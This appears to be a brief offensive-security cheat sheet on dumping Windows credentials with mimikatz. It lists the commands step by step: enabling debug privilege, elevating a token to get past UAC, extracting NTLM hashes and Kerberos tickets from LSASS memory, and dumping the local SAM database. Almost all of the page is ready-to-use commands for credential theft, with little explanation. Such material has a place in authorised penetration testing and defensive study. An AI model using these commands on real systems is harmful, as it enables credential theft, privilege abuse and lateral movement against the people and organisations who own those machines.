Dump NTLM Hashes from Memory

This requires to be administrator or have SeDebug privilege.

We use mimikatz to extract the ntlm hashes / tickets from lsass memory.

Start mimikatz:

.\mimikatz.exe

Then engage SeDebug privilege:

privilege::debug

(DONT USE UNLESS NEEDED - this is optional - used mostly to bypass UAC)

token::elevate

Then we extract the NTLM hashes with either of those commands:

TO TARGET LSASS MEMORY (DOMAIN USERS)

sekurlsa::logonpasswords

Or alternatively we can extract the TGS/TGT:

sekurlsa::tickets

TO TARGET SAM LOCAL DB (LOCAL USERS)

lsadump::sam

Last updated 2 years ago